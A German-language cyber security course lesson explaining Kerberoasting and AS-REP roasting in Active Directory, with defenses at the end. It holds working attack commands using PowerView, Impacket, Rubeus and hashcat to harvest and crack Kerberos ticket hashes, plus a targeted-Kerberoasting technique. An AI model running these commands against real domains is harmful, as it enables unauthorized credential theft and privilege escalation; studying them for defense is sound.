Kerberoasting und AS-REP-Roasting
Fordern Sie Kerberos-Diensttickets an und knacken Sie sie offline mit Hashcat.
Kerberoasting und AS-REP-Roasting ist eine kostenlose Cyber Security Academy-Lektion auf CoddyKit. Dies ist Lektion 3 von 4. Du kannst die komplette Lektion unten kostenlos lesen – dann übst du sie direkt im Browser mit einem integrierten Code-Editor und einem KI-Tutor rund um die Uhr. Sie ist Teil des Cyber Security Academy-Lernpfads, und dein Fortschritt wird über Web und CoddyKit-App synchronisiert. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.
Kerberos-Ticketverschlüsselung
Service-Tickets werden mit dem Passwort-Hash des Dienstkontos verschlüsselt. Jeder Domänenbenutzer kann ein Service-Ticket für jeden SPN anfordern. Wenn das Dienstkonto ein schwaches Passwort hat, kann das Ticket offline geknackt werden.
Was ist Kerberoasting?
Beim Kerberoasting werden Service-Tickets für Konten mit Service Principal Names (SPNs) angefordert, das verschlüsselte Ticket extrahiert und mit Hashcat offline geknackt. Dafür sind keine erhöhten Berechtigungen erforderlich: Jeder Domänenbenutzer kann dies tun.
# Steps:
# 1. Find accounts with SPNs
# 2. Request their service tickets
# 3. Extract ticket hashes
# 4. Crack with HashcatSPNs finden
Enumerieren Sie alle Dienstkonten mit SPNs mithilfe von PowerView, Impacket oder nativen AD-Tools. SPNs verknüpfen Dienstkonten mit ihren Diensten.
# PowerView (Windows)
Get-DomainUser -SPN
Get-NetUser -SPN | select name,serviceprincipalname
# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com
# Native LDAP query
ldapsearch -H ldap://dc -b "DC=corp,DC=com" \
"(servicePrincipalName=*)" cn servicePrincipalNameTickets anfordern und extrahieren
Rubeus (Windows) und GetUserSPNs aus Impacket (Linux) fordern beide Tickets an und geben sie in einem knackbar geeigneten Format aus.
# Rubeus (Windows)
Rubeus.exe kerberoast /format:hashcat /output:hashes.txt
# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com \
-request -outputfile hashes.txtMit Hashcat knacken
Kerberoast-Hashes verwenden den Modus 13100 (Kerberos 5 TGS-REP). Verwenden Sie für eine maximale Effektivität eine umfangreiche Wortliste mit Regeln.
# Crack TGS-REP hashes
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
# With rules for better coverage
hashcat -m 13100 hashes.txt rockyou.txt -r best64.rule
# AES tickets: mode 19700 (AES128) or 19800 (AES256)Was ist AS-REP Roasting?
AS-REP Roasting zielt auf Konten, für die Do not require Kerberos pre-authentication aktiviert ist. Die AS gibt ein mit dem Hash des Benutzers verschlüsseltes TGT zurück. Es kann ohne Kenntnis des Passworts angefordert und offline geknackt werden.
Konten mit deaktivierter Vorauthentifizierung finden
Konten ohne Vorauthentifizierung sind eine Fehlkonfiguration, die häufig von älteren Anwendungen zurückgelassen wird. Enumerieren Sie sie mit PowerView oder GetNPUsers.
# PowerView
Get-DomainUser -PreauthNotRequired
# Impacket GetNPUsers (no password needed!)
GetNPUsers.py CORP/ -usersfile users.txt \
-dc-ip dc.corp.com -format hashcat -outputfile asrep.txt
# Rubeus
Rubeus.exe asreproast /format:hashcat /output:asrep.txtAS-REP-Hashes knacken
AS-REP-Hashes verwenden den Hashcat-Modus 18200. Der Crack-Vorgang ist derselbe wie beim Kerberoasting: ein Offline-Wörterbuchangriff auf die verschlüsselte AS-Antwort.
# Crack AS-REP hashes
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
# With rules:
hashcat -m 18200 asrep.txt rockyou.txt -r best64.ruleAuswirkungsanalyse
Geknackte Passwörter von Dienstkonten verfügen häufig über erhöhte Berechtigungen. Dienstkonten, unter denen Datenbanken, Backup-Software oder Exchange ausgeführt werden, können Domänenadministratoren sein. AS-REP-Konten werden häufig übersehen und unzureichend geschützt.
Gezieltes Kerberoasting
Wenn Sie Schreibzugriff auf ein Objekt haben, können Sie vorübergehend einen SPN zu einem besonders wertvollen Konto hinzufügen, dieses per Kerberoasting angreifen, den Hash knacken und den SPN anschließend entfernen. So lassen sich gezielt bestimmte Konten nach Bedarf angreifen.
Schutzmaßnahmen
Schutz vor Kerberoasting: Verwenden Sie lange, zufällige Passwörter (25 oder mehr Zeichen) für Dienstkonten oder besser Group Managed Service Accounts (gMSA) mit automatisch wechselnden 120 Zeichen langen Passwörtern. Gegen AS-REP Roasting: Aktivieren Sie die Vorauthentifizierung für alle Konten.
Schnelltest
Welches Kontenattribut ist erforderlich, damit AS-REP Roasting funktioniert?
Zusammenfassung: Kerberoasting und AS-REP Roasting
Beide Angriffe nutzen Schwächen bei der Verschlüsselung von Kerberos-Tickets aus, um Passwörter offline zu knacken, ohne Kontosperrungen auszulösen. Kerberoasting zielt auf Konten mit SPNs ab (jeder Domänenbenutzer kann es durchführen). AS-REP Roasting zielt auf Konten ohne Vorauthentifizierung ab (keine Anmeldedaten erforderlich). Schützen Sie sich mit gMSA für Dienstkonten und erzwingen Sie die Vorauthentifizierung für alle Benutzer.
Häufig gestellte Fragen
Ist die Lektion „Kerberoasting und AS-REP-Roasting“ kostenlos?
Ja — der vollständige Text von „Kerberoasting und AS-REP-Roasting“ ist hier im Web kostenlos zu lesen. Um sie interaktiv zu üben (integrierter Code-Editor und 24/7 KI-Tutor) und den Rest des Cyber Security Academy-Kurses freizuschalten, upgrade auf CoddyKit PRO. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.
Was lerne ich in „Kerberoasting und AS-REP-Roasting“?
Fordern Sie Kerberos-Diensttickets an und knacken Sie sie offline mit Hashcat. Du übst Cyber Security Academy mit praktischem Code, den du direkt im Browser ausführst, und ein 24/7 KI-Tutor beantwortet deine Fragen während du die Lektion bearbeitest.
Brauche ich Erfahrung, um Cyber Security Academy zu starten?
Keine Vorkenntnisse erforderlich. Cyber Security Academy auf CoddyKit ist für Anfänger bis fortgeschrittene Lernende strukturiert, sodass du hier starten oder von Anfang an beginnen und in deinem eigenen Tempo voranschreiten kannst. Dies ist Lektion 3 von 4.
Wie lange dauert die Lektion „Kerberoasting und AS-REP-Roasting“?
Die meisten CoddyKit-Lektionen dauern etwa 5–10 Minuten. Jede ist kompakt und interaktiv, sodass du stetig Fortschritte machst und genau dort weitermachst, wo du aufgehört hast – im Web und in der App.
Kann ich in dieser Cyber Security Academy-Lektion Code schreiben und ausführen?
Ja. Jede Cyber Security Academy-Lektion enthält einen integrierten Code-Editor, sodass du echten Code direkt in deinem Browser schreibst und ausführst und sofort KI-Feedback erhältst — ohne lokale Einrichtung erforderlich.
Alle Lektionen in diesem Kurs
- Windows-Authentifizierung: NTLM und Kerberos
- Pass-the-Hash- und Pass-the-Ticket-Angriffe
- Kerberoasting und AS-REP-Roasting
- Absicherung von Active Directory